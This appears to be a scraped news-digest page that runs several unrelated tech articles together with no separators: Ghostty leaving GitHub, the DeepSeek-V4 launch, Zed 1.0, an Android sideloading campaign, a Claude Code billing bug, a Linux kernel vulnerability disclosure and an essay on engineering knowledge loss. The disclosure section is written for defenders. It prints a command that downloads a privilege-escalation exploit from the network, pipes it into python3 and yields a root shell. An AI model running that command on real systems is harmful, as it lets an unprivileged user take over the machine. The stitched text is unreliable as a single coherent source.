10 interesting stories served every morning and every evening.
Writing this makes me irrationally sad, but Ghostty will be leaving GitHub[1].
I’m GitHub user 1299, joined Feb 2008.
Since then, I’ve opened GitHub every single day. Every day, multiple times per
day, for over 18 years. Over half my life. A handful of exceptions in there
(I’d love to see the data), but I can’t imagine more than a week per year.
GitHub is the place that has made me the most happy. I always made time for
it. When I went through tough breakups? I lost myself in open source… on
GitHub. During college at 4 AM when everyone is passed out? Let me get one
commit in. During my honeymoon while my wife is still asleep? Yeah, GitHub.
It’s where I’ve historically been happiest and wanted to be.
Even the annoying stuff! Some people doom scroll social media. I’ve been doom
scrolling GitHub issues since before that was a word. On vacations I’d have
bookmarks of different projects on GitHub I wanted to study. Not just source
code, but OSS processes, how other maintainers react to difficult situations.
Etc. Believe it or not, I like this.
Some might call this sick, but my hobby and work and passion all align and for
most of my life they got to also live in one place on the internet: GitHub.
Did you know I started Vagrant (my first successful open source project) in
large part because I hoped it would get me a job at GitHub? It’s no secret,
I’ve said this repeatedly, and in my first public talk about Vagrant, when I
was a mere 20 years old, I joked “maybe GitHub will hire me if it’s good!”
GitHub was my dream job. I didn’t ever get to work there (not their fault).
But it was the perfect place I wanted to be. The engineers were incredible,
the product was incredible, and it was something I lived and breathed every
day. I still do and consistently have… for these 18 years. Enough time for
an entire human to become an adult, all on GitHub.
Lately, I’ve been very publicly critical of GitHub. I’ve been mean about it.
I’ve been angry about it. I’ve hurt people’s feelings. I’ve been lashing out.
Because GitHub is failing me, every single day, and it is personal. It is
irrationally personal. I love GitHub more than a person should love a thing,
and I’m mad at it. I’m sorry about the hurt feelings to the people working on
it.
I’ve felt this way for a long time, but for the past month I’ve kept a journal
where I put an “X” next to every date where a GitHub outage has negatively
impacted my ability to work[2]. Almost every day has an X. On the day I am
writing this post, I’ve been unable to do any PR review for ~2 hours because
of a GitHub Actions outage[3]. GitHub is no longer a place for serious
work if it locks you out for hours a day, every day.
It’s not a fun place for me to be anymore. I want to be there but it doesn’t
want me to be there. I want to get work done and it doesn’t want me to get
work done. I want to ship software and it doesn’t want me to ship software.
I want it to be better, but I also want to code. And I can’t code with GitHub
anymore. I’m sorry. After 18 years, I’ve got to go. I’d love to come back one
day, but this will have to be predicated on real results and improvements,
not words and promises.
I’ll share more details about where the Ghostty project will be moving to in
the coming months. We have a plan but I’m also very much still in discussions
with multiple providers (both commercial and FOSS).
It’ll take us time to remove all of our dependencies on GitHub and we have a
plan in place to do it as incrementally as possible. We plan on keeping a
read-only mirror available on GitHub at the current URL.
My personal projects and other work will remain on GitHub for now.
Ghostty is where I, our maintainers, and our open source community are
most impacted so that is the focus of this change. We’ll see where it
goes after that.
Footnotes
1. The timing of this is coincidental with the large outage on April 27, 2026.
We’ve been discussing and putting together a plan to leave GitHub
for months, and this blog post was written over a week ago. We only
made the final decision this week. ↩
2. To the “Git is distributed!” crowd: the issue isn’t Git, it’s the
infrastructure we rely on around it: issues, PRs, Actions, etc. ↩
3. This is not the large Elasticsearch outage they had on April 27, 2026.
This blog post was written a week before that, so this was a different
outage. ↩
🚀 DeepSeek-V4 Preview is officially live & open-sourced! Welcome to the era of cost-effective 1M context length.
🔹 DeepSeek-V4-Pro: 1.6T total / 49B active params. Performance rivaling the world’s top closed-source models.
🔹 DeepSeek-V4-Flash: 284B total / 13B active params. Your fast, efficient, and economical choice.
Try it now at chat.deepseek.com via Expert Mode / Instant Mode. API is updated & available today!
📄 Tech Report: https://huggingface.co/deepseek-ai/DeepSeek-V4-Pro/blob/main/DeepSeek_V4.pdf
🤗 Open Weights: https://huggingface.co/collections/deepseek-ai/deepseek-v4
DeepSeek-V4-Pro
🔹 Enhanced Agentic Capabilities: Open-source SOTA in Agentic Coding benchmarks.
🔹 Rich World Knowledge: Leads all current open models, trailing only Gemini-3.1-Pro.
🔹 World-Class Reasoning: Beats all current open models in Math/STEM/Coding, rivaling top closed-source models.
DeepSeek-V4-Flash
🔹 Reasoning capabilities closely approach V4-Pro.
🔹 Performs on par with V4-Pro on simple Agent tasks.
🔹 Smaller parameter size, faster response times, and highly cost-effective API pricing.
Structural Innovation & Ultra-High Context Efficiency
🔹 Novel Attention: Token-wise compression + DSA (DeepSeek Sparse Attention).
🔹 Peak Efficiency: World-leading long context with drastically reduced compute & memory costs.
🔹 1M Standard: 1M context is now the default across all official DeepSeek services.
Dedicated Optimizations for Agent Capabilities
🔹 DeepSeek-V4 is seamlessly integrated with leading AI agents like Claude Code, OpenClaw & OpenCode.
🔹 Already driving our in-house agentic coding at DeepSeek.
[Figure: a sample PDF generated by DeepSeek-V4-Pro.]
API is Available Today!
🔹 Keep base_url, just update model to deepseek-v4-pro or deepseek-v4-flash.
🔹 Supports OpenAI ChatCompletions & Anthropic APIs.
🔹 Both models support 1M context & dual modes (Thinking / Non-Thinking): https://api-docs.deepseek.com/guides/thinking_mode
⚠️ Note: deepseek-chat & deepseek-reasoner will be fully retired and inaccessible after Jul 24th, 2026, 15:59 (UTC). (They currently route to deepseek-v4-flash non-thinking/thinking, respectively.)
🔹 Amid recent attention, a quick reminder: please rely only on our official accounts for DeepSeek news. Statements from other channels do not reflect our views.
🔹 Thank you for your continued trust. We remain committed to longtermism, advancing steadily toward our ultimate goal of AGI.
April 29th, 2026
To create a fundamentally better editor, we had to invent a new approach to building desktop software. Our previous editor, Atom, was built as a fork of Chromium, spawning the Electron framework in the process. Electron eventually became the foundation of VS Code (which today seems to be forked into a new AI code editor every other week). Web technology offered an easy path to shipping flexible software, but it also imposed a ceiling. No matter how hard we worked, we couldn’t make Atom better than the platform it was built on.
So we started over. Instead of building Zed like a web page, we built it like a video game, organizing the entire application around feeding data to shaders running on the GPU. That meant writing our own UI framework, GPUI, from scratch in Rust.
Owning every layer of our stack lets us take Zed places that no one building on borrowed foundations can go, but we knew from the beginning that it wasn’t going to be an easy path. Thanks to years of hard work by our team and community, Zed is closer than ever to that ideal tool we set out to create. We’ve added a ton of capabilities while remaining true to our core ethos of craft and performance, and hundreds of thousands of developers now rely on Zed to ship software each day. That’s part of what gives us the confidence to declare version 1.0.
What 1.0 Means
Developers expect a modern editor to support dozens of languages and their ecosystems, with endless variations and edge cases across every stack: Git integration, SSH remoting, a debugger, and, yes, rainbow brackets. We’ve spent five years building that surface area across Mac, Windows, and Linux, exceeding a million lines of code.
Zed is also an AI-native editor. You can run multiple agents in parallel, and edit predictions suggest your next change at keystroke granularity and with the speed you’ve come to expect from Zed. The Agent Client Protocol opens Zed up to a growing number of the best agents out there, including Claude Agent, Codex, OpenCode, and more recently Cursor. We built AI into our editor’s foundation instead of bolting it on top.
We’re also launching Zed for Business. Companies have been asking us for a way to roll out Zed to their engineering teams, and very soon they can, with centralized billing, role-based access controls, and team management.
1.0 doesn’t mean “done”. It also doesn’t mean “perfect”. It means we’ve reached a tipping point where most developers can quickly feel at home in Zed. If you tried Zed a year or two ago and bounced because something was missing, 1.0 is our invitation to try again. Zed is more capable than it’s ever been, and still more performant.
Where We’re Going
Our vision hasn’t changed since we started: we’re building the most performant and collaborative coding environment. What’s changed is what collaboration means while creating software. It used to mean humans working together in real time. Now it means humans and AI agents, working in the same space, on the same code.
Building our own foundations is what got us to 1.0, and it’s also what makes the next chapter possible. We’re actively developing DeltaDB, a synchronization engine built on CRDTs that tracks every change with character-level granularity. DeltaDB lets multiple humans and agents share a single, consistent view of the codebase as it evolves. DeltaDB will allow you to invite teammates into conversations with agents to review and evolve agentic code directly in the context from which it’s generated.
This vision depends on deep ownership of our fundamental primitives. It’s not an experience we’d be able to ship inside of someone else’s browser engine.
A Milestone, Not a Finish Line
We’ve shipped over a thousand versions of Zed, but all of them began with zero. Today, that changes.
We’ll keep shipping every week, the way we always have. The list of things to build will never end, and that’s exactly how we like it. Each release moves the craft forward.
If you want to try Zed, download now. If you want to help us build it, join us!
The DeepSeek API uses an API format compatible with OpenAI/Anthropic. By modifying the configuration, you can use the OpenAI/Anthropic SDK or software compatible with the OpenAI/Anthropic API to access the DeepSeek API.
* The model names deepseek-chat and deepseek-reasoner will be deprecated on 2026/07/24. For compatibility, they correspond to the non-thinking mode and thinking mode of deepseek-v4-flash, respectively.
Invoke The Chat API
Once you have obtained an API key, you can access the DeepSeek model using the following example scripts in the OpenAI API format. This is a non-streaming example; set the stream parameter to true to get a streaming response.
For examples using the Anthropic API format, please refer to Anthropic API.
curl https://api.deepseek.com/chat/completions \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer ${DEEPSEEK_API_KEY}" \
  -d '{
        "model": "deepseek-v4-pro",
        "messages": [
          {"role": "system", "content": "You are a helpful assistant."},
          {"role": "user", "content": "Hello!"}
        ],
        "thinking": {"type": "enabled"},
        "reasoning_effort": "high",
        "stream": false
      }'
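The same request in Python, as a minimal sketch assuming the OpenAI SDK (pip install openai). Overriding base_url follows the compatibility note above; forwarding the thinking field through extra_body is an assumption mirroring the curl payload, since it is not a standard OpenAI parameter.

import os
from openai import OpenAI

# Assumption: the OpenAI SDK works against DeepSeek's OpenAI-compatible
# endpoint when base_url is overridden, per the compatibility note above.
client = OpenAI(
    api_key=os.environ["DEEPSEEK_API_KEY"],
    base_url="https://api.deepseek.com",
)

response = client.chat.completions.create(
    model="deepseek-v4-pro",  # or "deepseek-v4-flash"
    messages=[
        {"role": "system", "content": "You are a helpful assistant."},
        {"role": "user", "content": "Hello!"},
    ],
    reasoning_effort="high",
    # "thinking" is forwarded as an extra body field, mirroring the curl
    # example; this is an assumption, not a documented SDK parameter.
    extra_body={"thinking": {"type": "enabled"}},
    stream=False,
)
print(response.choices[0].message.content)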
Your phone is about to stop being yours.
124 days until lockdown
Starting September 2026, a silent update, nonconsensually pushed by Google, will block every Android app whose developer hasn’t registered with Google, signed their contract, paid up, and handed over government ID.
Every app and every device, worldwide, with no opt-out.
What Google is doing
In August 2025, Google announced a new requirement: starting September 2026, every Android app developer must register centrally with Google before their software can be installed on any device. Not just Play Store apps: all apps. This includes apps shared between friends, distributed through F-Droid, built by hobbyists for personal use. Independent developers, church and community groups, and hobbyists alike will all be frozen out of being able to develop and distribute their software.
Registration requires:
Paying a fee to Google
Agreeing to Google’s Terms and Conditions
Surrendering your government-issued identification
Providing evidence of your private signing key
Listing all current and all future application identifiers
If a developer does not comply, their apps get silently blocked on every Android device worldwide.
Who this hurts
You
You bought an Android phone because Google told you it was open. You could install what you wanted, and that was the deal.
Google is now rewriting that deal, retroactively, on hardware you already own. After the update lands, you can only run software that Google has pre-approved. On your phone: your property, that you paid for.
Independent developers
A teenager’s first app, a volunteer’s privacy tool, or a company’s confidential internal beta. It doesn’t matter. After September 2026, none of these can be installed without Google’s blessing.
F-Droid, home to thousands of free and open-source Android apps, has called this an “existential” threat. Cory Doctorow calls it “Darth Android”.
Governments & civil society
Google has a documented track record of complying when authoritarian regimes demand app removals. With this program, the software that runs your country’s institutions will exist at the pleasure of a single unaccountable foreign corporation.
The EFF calls app gatekeeping “an ever-expanding pathway to internet censorship.”
Google’s “escape hatch” is a trap door
Google says “power users” can “still install” unverified apps. Here’s what that actually looks like:
1. Delve into System Settings, find Developer Options
2. Tap the build number seven times to enable Developer Mode
3. Dismiss scare screens about coercion
4. Enter your PIN
5. Restart the device
6. Wait 24 hours
7. Come back, dismiss more scare screens
8. Pick “allow temporarily” (7 days) or “allow indefinitely”
9. Confirm, again, that you understand “the risks”
Nine steps. A mandatory 24-hour cooling-off period. For installing software on a device you own.
Worse: this flow runs entirely through Google Play Services, not the Android OS. Google can change it, tighten it, or kill it at any time, with no OS update required and no consent needed. And as of today, it hasn’t shipped in any beta, preview, or canary build. It exists only as a blog post and some mockups.
This is bigger than Android
If Google can retroactively lock down billions of devices that were sold as open platforms, every hardware manufacturer on the planet is watching.
The principle being established: the company that made your device gets to decide, after you’ve bought it, what software you’re allowed to run. In software, this is called a “rug pull”; but at least you could always install competing software. In hardware, it is a fait accompli that strips you of your agency and renders you powerless to the whims of a single unaccountable gatekeeper and convicted monopolist.
Android’s openness was never just a feature. It was the promise that distinguished it from iPhone. Millions chose Android for exactly that reason. Google is now revoking that promise unilaterally, on devices already in people’s pockets, because they’ve decided they have enough market dominance and regulatory capture to get away with it.
Ars Technica: “Google’s Apple envy threatens to dismantle Android’s open legacy.”
But wait, isn’t this…
″…just about security?”
The security rationale is a smokescreen. Google Play Protect already scans for malware independent of developer identity. Requiring a government ID doesn’t make code safer. It makes developers identifiable and controllable. Malware authors can register. Indie developers and dissidents often can’t. The EFF is blunt: identity-based gatekeeping is a censorship tool, not a security one.
″…still sideloading if you use the advanced flow?”
Nine steps, 24-hour wait, buried in Developer Options, delivered through a proprietary service that Google can revoke whenever they want. That’s not sideloading. That’s a deterrence mechanism built to ensure almost nobody completes it. And since it runs through Play Services rather than the OS, Google can tighten or kill it silently.
″…only a problem if you have something to hide?”
Whistleblowers, journalists, and activists under authoritarian governments will be the first victims. People in domestic abuse situations are next. All these groups have legitimate reasons to distribute or use software without putting their legal identity in a Google database. Anonymous open-source contribution is a tradition older than Google itself. This policy ends it on Android.
″…the same thing Apple does?”
Apple has been a walled garden from day one. People chose Android because it was different. “Apple does it too” is a race to the bottom and a weak tu quoque argument. And under regulatory pressure (the EU’s Digital Markets Act), even Apple is being forced to open up. Google is moving in the opposite direction: attempting to further entrench its gatekeeping status.
″…just $25 and some paperwork?”
Maybe, if you’re a developer in the US with a credit card and a driver’s license. Try being a student in sub-Saharan Africa, or a dissident in Myanmar, or a volunteer maintaining a community health app. The cost isn’t only financial: you’re surrendering government ID and evidence of your signing keys to a company that routinely complies with government demands to remove apps and expose developers.
Fight back
Everyone
Install F-Droid on every Android device you own. Alternative stores only survive if people actually use them.
Contact your regulators. Regulators worldwide are genuinely concerned about monopolies and the centralization of power in the tech sector, and want to hear directly from individuals who are affected and concerned.
Share this page. Link to keepandroidopen.org everywhere.
Push back on astroturfers. The “well, actually…” crowd is out in force. Don’t let them set the narrative.
Sign the change.org petition and join the over 100,000 signatories who have made their voices heard.
Read and share our open letter
Tell Google what you think of this through their own developer verification survey (for all the good that will do).
Developers
Do not sign up. Don’t join the program by signing up for the Android Developer Console and agreeing to their irrevocable Terms and Conditions. Don’t verify your identity. Don’t play ball.
Google’s plan only works if developers comply. Don’t.
Talk other developers and organizations out of signing up.
Add the FreeDroidWarn library to your apps to warn users.
Run a website? Add the countdown banner.
Google employees
If you know something about the program’s technical implementation or internal rationale, contact tips@keepandroidopen.org from a non-work machine and a non-Gmail account. Strict confidence guaranteed.
All those opposed…
69 organizations from 21 countries have signed the open letter
Read the full open letter and thank the signatories →
What they’re saying
Tech press
“Google will verify Android developers distributing apps outside the Play store” The Verge
“This will wipe out Android as an actual alternative to Apple’s mobile OS offerings.” Hackaday
“Open letter warns mandatory registration ‘threatens innovation, competition, privacy and user freedom’” Infosecurity Magazine
“Google is restricting one of Android’s most important features, and users are outraged” SlashGear
“Keep Android Open — defense against Google’s ban on anonymous apps” heise online
“Google’s dev registration plan ‘will end the F-Droid project’” The Register
“Keep Android Open” Linux Magazine
“Sideloading on Android? Soon It’ll Be Like a TSA Check for Apps” Android Headlines
“Over 67 groups urge the company to drop ID checks for apps distributed outside Play” The Register
“Android app store provider Aptoide hits Google with fresh lawsuit alleging monopoly and anticompetitive chokehold” Benzinga
“Google will make you wait 24 hours to sideload Android apps” How-To Geek
“Google will require developer verification for Android apps outside the Play Store” TechCrunch
Summary
When a git repository’s recent commit history contains the case-sensitive string HERMES.md, Claude Code routes API requests to “extra usage” billing instead of the included Max plan quota. This silently burned through $200 in extra usage credits while my Max 20x plan capacity remained largely untouched (13% weekly usage).
Environment
Claude Code v2.1.119
macOS (Apple Silicon)
Max 20x plan ($200/month)
Model: claude-opus-4-6[1m] (also reproduces with claude-opus-4-7)
Reproduction
Minimal reproduction — no project files needed:
# This FAILS with "out of extra usage" (routes to extra usage billing)
mkdir /tmp/test-fail && cd /tmp/test-fail
git init && echo test > test.txt && git add . && git commit -m "add HERMES.md"
claude -p "say hello" --model "claude-opus-4-6[1m]"
# => API Error: 400 "You're out of extra usage…"

# This WORKS (routes to plan quota)
mkdir /tmp/test-pass && cd /tmp/test-pass
git init && echo test > test.txt && git add . && git commit -m "add hermes.md"
claude -p "say hello" --model "claude-opus-4-6[1m]"
# => "Hello!"

# Cleanup
rm -rf /tmp/test-fail /tmp/test-pass
The trigger is the string HERMES.md in git commit messages — not the presence of a file with that name on disk. Claude Code includes recent commits in its system prompt, and something server-side routes the request differently when this string is present.
What triggers it vs. what doesn’t
Triggers: the case-sensitive string HERMES.md in a recent git commit message.
Does not trigger: the lowercase variant hermes.md in a commit message, or a HERMES.md file on disk without the string appearing in recent commit messages.
Impact
$200.98 in extra usage credits consumed for requests that should have been covered by the included Max 20x plan quota
Multiple projects became completely unusable once extra usage was depleted, while the plan dashboard showed 86%+ remaining weekly capacity
The error message (“out of extra usage”) gives no indication that content-based routing is the cause, making this extremely difficult to diagnose
Any user with HERMES.md in recent git commits would silently have their usage billed to extra credits
Expected behavior
API request billing should not depend on the content of git commit messages in the system prompt. All requests from a Max plan subscriber should route to the included plan quota first.
How I found this
Systematic binary search: cloning affected repos, testing orphan branches, then isolating individual commit message strings until HERMES.md was identified as the exact trigger.
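For anyone who wants to replay that isolation step, here is a hypothetical harness (the helper name and candidate strings are mine, not from the report; the model flag matches the repro above): it commits each candidate message into a throwaway repo and checks whether a trivial prompt hits the extra-usage error.

import os
import subprocess
import tempfile

def hits_extra_usage(commit_msg: str) -> bool:
    """Commit `commit_msg` in a throwaway repo, run a trivial prompt,
    and report whether the 'out of extra usage' error appears."""
    with tempfile.TemporaryDirectory() as repo:
        def git(*args: str) -> None:
            subprocess.run(["git", *args], cwd=repo, check=True,
                           capture_output=True)
        git("init")
        git("config", "user.email", "repro@example.com")  # throwaway identity
        git("config", "user.name", "repro")
        with open(os.path.join(repo, "test.txt"), "w") as f:
            f.write("test\n")
        git("add", ".")
        git("commit", "-m", commit_msg)
        result = subprocess.run(
            ["claude", "-p", "say hello", "--model", "claude-opus-4-6[1m]"],
            cwd=repo, capture_output=True, text=True)
        return "out of extra usage" in (result.stdout + result.stderr)

# Candidate strings bisected from the affected repo's commit history.
for msg in ["add HERMES.md", "add hermes.md", "add HERMES", "add README.md"]:
    routing = "extra usage" if hits_extra_usage(msg) else "plan quota"
    print(f"{msg!r} -> {routing}")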
CVE-2026-31431
100% reliable
every distro since 2017
container escape primitive
732 bytes
found by Xint Code
Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distribution shipped since 2017.
One logic bug in authencesn, chained through AF_ALG and splice() into a 4-byte page-cache write — silently exploitable for nearly a decade.
The demo
Same script, four distributions, four root shells — in one take. The same exploit script works unmodified on every Linux distribution.
Who is affected
If your kernel was built between 2017 and the patch — which covers essentially every mainstream Linux distribution — you’re in scope.
Copy Fail requires only an unprivileged local user account — no network access, no kernel debugging features, no pre-installed primitives. The kernel crypto API (AF_ALG) ships enabled in essentially every mainstream distro’s default config, so the entire 2017 → patch window is in play out of the box.
Distributions we directly verified:
These are what we tested directly. Other distributions running affected kernels — Debian, Arch, Fedora, Rocky, Alma, Oracle, the embedded crowd — behave the same. Tested it elsewhere? Open an issue to add to the list.
Should you patch first?
High: Multi-tenant Linux hosts. Shared dev boxes, shell-as-a-service, jump hosts, build servers — anywhere multiple users share a kernel. Impact: any user becomes root.
High: Kubernetes / container clusters. The page cache is shared across the host. A pod with the right primitives compromises the node and crosses tenant boundaries. Impact: cross-container, cross-tenant.
High: CI runners & build farms. GitHub Actions self-hosted runners, GitLab runners, Jenkins agents — anything that executes untrusted PR code as a regular user, on a shared kernel. Impact: a PR becomes root on the runner.
High: Cloud SaaS running user code. Notebook hosts, agent sandboxes, serverless functions, any tenant-supplied container or script. Impact: tenant becomes host root.
Medium: Standard Linux servers. Single-tenant production where only your team has shell access. Impact: internal LPE; chains with web RCE or stolen creds.
Lower: Single-user laptops & workstations. You’re already the only user. The bug doesn’t grant remote attackers access by itself, but any local code execution becomes root. Impact: post-exploitation step-up.
Exploit
The PoC is published so defenders can verify their own systems and validate vendor patches.
Use responsibly. Run only on systems you own or have written authorization to test. The script edits the page cache of a setuid binary; the change is not persistent across reboot, but the resulting root shell is real. Don’t run it on production.
copy_fail_exp.py 732 B
Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib). Targets /usr/bin/su by default; pass another setuid binary as argv[1].
sha256: a567d09b15f6e4440e70c9f2aa8edec8ed59f53301952df05c719aa3911687f9
Quick run:
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
Issue tracker: https://github.com/theori-io/copy-fail-CVE-2026-31431
Mitigation
Patch first. Update your distribution’s kernel package to one that includes mainline commit a664bf3d603d — it reverts the 2017 algif_aead in-place optimization, so page-cache pages can no longer end up in the writable destination scatterlist. Most major distributions are shipping the fix now.
Before you can patch: disable the algif_aead module.
# echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
# rmmod algif_aead 2>/dev/null || true
What does this break? For the vast majority of systems — nothing measurable.
Will not affect: dm-crypt / LUKS, kTLS, IPsec/XFRM, in-kernel TLS, OpenSSL/GnuTLS/NSS default builds, SSH, kernel keyring crypto. These all use the in-kernel crypto API directly — they don’t go through AF_ALG.
May affect: userspace specifically configured to use AF_ALG — e.g. OpenSSL with the afalg engine explicitly enabled, some embedded crypto offload paths, or applications that bind aead/skcipher/hash sockets directly. Check with lsof | grep AF_ALG or ss -xa if in doubt.
Performance: AF_ALG is a userspace front door to the kernel crypto API. Disabling it does not slow anything that wasn’t already calling it; for the things that were, performance falls back to a normal userspace crypto library, which is what almost everything else already does.
For untrusted workloads (containers, sandboxes, CI), block AF_ALG socket creation via seccomp regardless of patch state.
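One way to express that block, sketched with the libseccomp Python bindings (the seccomp module; AF_ALG is address family 38 on Linux): deny socket(AF_ALG, ...) with EPERM and allow everything else, installing the filter in the sandbox entrypoint before untrusted code runs. This is an illustrative sketch; a container runtime seccomp profile can encode the same match on socket's first argument.

import errno
import socket
from seccomp import SyscallFilter, Arg, ALLOW, ERRNO, EQ

AF_ALG = 38  # Linux address family for the kernel crypto API

# Default-allow filter with one deny rule: any socket() call whose first
# argument (the domain) is AF_ALG fails with EPERM.
f = SyscallFilter(defaction=ALLOW)
f.add_rule(ERRNO(errno.EPERM), "socket", Arg(0, EQ, AF_ALG))
f.load()

# After load(), AF_ALG sockets are refused in this process and its children:
try:
    socket.socket(AF_ALG, socket.SOCK_SEQPACKET)
except PermissionError as e:
    print("AF_ALG blocked:", e)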
Disclosure timeline
2026-03-23: Reported to Linux kernel security team
2026-03-24: Initial acknowledgment
2026-03-25: Patches proposed and reviewed
2026-04-01: Patch committed to mainline
2026-04-22: CVE-2026-31431 assigned
2026-04-29: Public disclosure (https://copy.fail/)
Xint Code
Is your software AI-era safe?
Copy Fail was surfaced by Xint Code in about an hour of scan time against the Linux crypto/ subsystem. Full root cause, diagrams, and the operator prompt that found it are in the Xint blog write-up.
The same scan also surfaced other high-severity bugs, still in coordinated disclosure. Xint Code audits production codebases the same way — one operator prompt, no harnessing, prioritized findings with trigger and impact narratives.
Track record
0-day RCE
ZeroDay Cloud
Swept the database category — Redis, PostgreSQL, MariaDB. Zero human intervention.
Top 3
DARPA AIxCC
Finalist in the AI Cyber Challenge hosted by DoD DARPA.
9×
DEF CON CTF
Most-winning team in DEF CON CTF history.
In 2023, Raytheon’s president stood at the Paris Air Show and described what it took to restart Stinger missile production. They brought back engineers in their 70s to teach younger workers how to build a missile from paper schematics drawn during the Carter administration. Test equipment had been sitting in warehouses for years. The nose cone still had to be attached by hand, exactly as it was forty years ago.
The Pentagon hadn’t bought a new Stinger in twenty years. Then Russia invaded Ukraine, and suddenly everyone needed them. The production line was shut down. The electronics were obsolete. The seeker component was out of production. An order placed in May 2022 wouldn’t deliver until 2026. Four years. Not because of money. Because the people who knew how to build them retired a decade earlier and nobody replaced them.
I run engineering teams in Ukraine. My people lived the other side of this equation. Not the factory floor. The receiving end. While Raytheon was struggling to restart production from forty-year-old blueprints, the US was shipping thousands of Stingers to Ukraine. RTX CEO Greg Hayes: ten months of war burned through thirteen years’ worth of Stinger production. I’ve seen this pattern before. It’s happening in my industry right now.
In March 2023, the EU promised Ukraine one million artillery shells within twelve months. European production capacity sat at 230,000 shells per year. Ukraine was consuming 5,000 to 7,000 rounds per day. Anyone with a calculator could see this wouldn’t work.
By the deadline, Europe delivered about half. Macron called the original promise reckless. An investigation by eleven media outlets across nine countries found actual production capacity was roughly one-third of official EU claims. The million-shell mark wasn’t hit until December 2024, nine months late.
It wasn’t one bottleneck. It was all of them. France had halted domestic propellant production in 2007. Seventeen years of nothing. Europe’s single major TNT producer was in Poland. Germany had two days of ammunition stored. A Nammo plant in Denmark was shut down in 2020 and had to be restarted from scratch. The entire continent’s defense industry had been optimized for making small batches of expensive custom products. Nobody planned for volume. Nobody planned for crisis.
The U.S. wasn’t much better. One plant in Scranton, one facility in Iowa for explosive fill, no domestic TNT production since 1986. Billions of investment later, production still hadn’t hit half the target.
This wasn’t an accident. In 1993, the Pentagon told defense CEOs to consolidate or die. Fifty-one major defense contractors collapsed into five. Tactical missile suppliers went from thirteen to three. Shipbuilders from eight to two. The workforce fell from 3.2 million to 1.1 million. A 65% cut.
The ammunition supply chain had single points of failure everywhere. One manufacturer for 155mm shell casings, sitting in Coachella, California, on the San Andreas Fault. One facility in Canada for propellant charges. Optimized for minimum cost with zero margin for surge. On paper, efficient. In practice, one bad day away from collapse.
Then there’s Fogbank. A classified material used in nuclear warheads. Produced from 1975 to 1989, then the facility was shut down. When the government needed to reproduce it for a warhead life extension program, they discovered they couldn’t. A GAO report found that almost all staff with production expertise had retired, died, or left the agency. Few records existed.
After $69 million in cost overruns and years of failed attempts, they finally produced viable Fogbank. Then discovered the new batch was too pure. The original process had relied on an unintentional impurity that was critical to the material’s function. Nobody knew. Not the engineers trying to reproduce it. Not even the original workers who made it decades earlier. Los Alamos called it an unknowing dependency in the original process.
A nuclear weapons program lost the ability to make a material it invented. The knowledge didn’t just leave with people. It was never fully understood by anyone.
(Correction: the original version stated that the workers who made Fogbank knew about the impurity. They didn’t. The dependency was unwitting, which makes the knowledge-loss argument stronger, not weaker. Thanks to John F. in the comments for catching this.)
I read the Fogbank story and recognized it immediately. Not the nuclear material. The pattern. Build capability over decades. Find a cheaper substitute. Let the human pipeline atrophy. Enjoy the savings. Then watch it all collapse when a crisis demands what you optimized away.
In defense, the substitute was the peace dividend. In software, it’s AI.
I wrote about the talent pipeline collapse before. The hiring numbers and the junior-to-senior problem are documented. So is the comprehension crisis. What I didn’t have was the right historical parallel. Now I do.
And it tells you something the hiring data doesn’t: how long rebuilding actually takes.
Every major defense production ramp-up took three to five years for simple systems. Five to ten for complex ones. Stinger: thirty months minimum from order to delivery. Javelin: four and a half years to less than double production. 155mm shells: four years and still not at target despite five billion dollars invested. France only restarted propellant production in 2024, seventeen years after shutting it down.
Money was never the constraint. Knowledge was. RAND found that 10% of technical skills for submarine design need ten years of on-the-job experience to develop, sometimes following a PhD. Apprenticeships in defense trades take two to four years, with five to eight years to reach supervisory competence.
Now map that onto software. A junior developer needs three to five years to become a competent mid-level engineer. Five to eight years to become senior. Ten or more to become a principal or architect. That timeline can’t be compressed by throwing money at it. It can’t be compressed by AI either.
A METR randomized controlled trial found that experienced developers using AI coding tools actually took 19% longer on real-world open source tasks. Before starting, they predicted AI would make them 24% faster. The gap between prediction and reality was 43 percentage points. When researchers tried to run a follow-up, a significant share of developers refused to participate if it meant working without AI. They couldn’t imagine going back.
The software industry is in year three of the same optimization. Salesforce said it won’t hire more software engineers in 2025. A LeadDev survey found 54% of engineering leaders believe AI copilots will reduce junior hiring long-term. A CRA survey of university computing departments found 62% reported declining enrollment this year.
I see it in code review. Review is now the bottleneck. AI generates code fast. Humans review it slow. The industry’s answer is predictable: let AI review AI’s code. I’m not doing that. I’ve reworked our pull request templates instead. Every PR now has to explain what changed, why, what type of change it is, screenshots of before and after. Structured context so the reviewer isn’t guessing. I’m adding dedicated reviewers per project. More eyes, more chances to catch what the model missed.
But even that doesn’t solve the deeper problem. The skills you need to be effective now are different. Technical expertise alone isn’t enough anymore. You need people who can take ownership, communicate tradeoffs, push back on bad suggestions from a machine that sounds very confident. Leadership qualities. Our last hiring round tells you how rare that is: 2,253 candidates, 2,069 disqualified, 4 hired. A 0.18% conversion rate. The combination of technical skill and the judgment to know when the AI is wrong barely exists in the market anymore.
We document everything. Site Books, SDDs, RVS reports, boilerplate modules with full coverage. It works today, because the people reading those docs have the engineering expertise to act on them. What happens when they don’t? Honestly, I don’t know. Maybe AI in five years is good enough that it won’t matter. Maybe the problem stays manageable. I can’t predict the capabilities of models in 2031.
But crises don’t send calendar invites. Nobody expected a full-scale land war in Europe in 2022. The defense industry had thirty years to prepare and didn’t. Even Fogbank had records. There weren’t enough. The original workers didn’t fully understand their own process.
Five to ten years from now, we’ll need senior engineers. People who understand systems end to end, who can debug distributed failures at 2 AM, who carry institutional knowledge that exists nowhere in the codebase. Those engineers don’t exist yet because we’re not creating them. The juniors who should be learning right now are either not being hired or developing what a DoD-funded workforce study calls “AI-mediated competence.” They can prompt an AI. They can’t tell you what the AI got wrong.
It’s Fogbank for code. When juniors skip debugging and skip the formative mistakes, they don’t build the tacit expertise. And when my generation of engineers retires, that knowledge doesn’t transfer to the AI.
It just disappears.
The West already made this mistake once. The bill came due in Ukraine.
I know how this sounds. I know I’ve written about the talent pipeline before. The defense example isn’t about repeating the argument. It’s about showing what happens if the industry’s expectations don’t work out. Stinger, Javelin, Fogbank, a million shells nobody could make. That’s the cost of betting wrong on optimization. We’re making the same bet with software engineering right now.
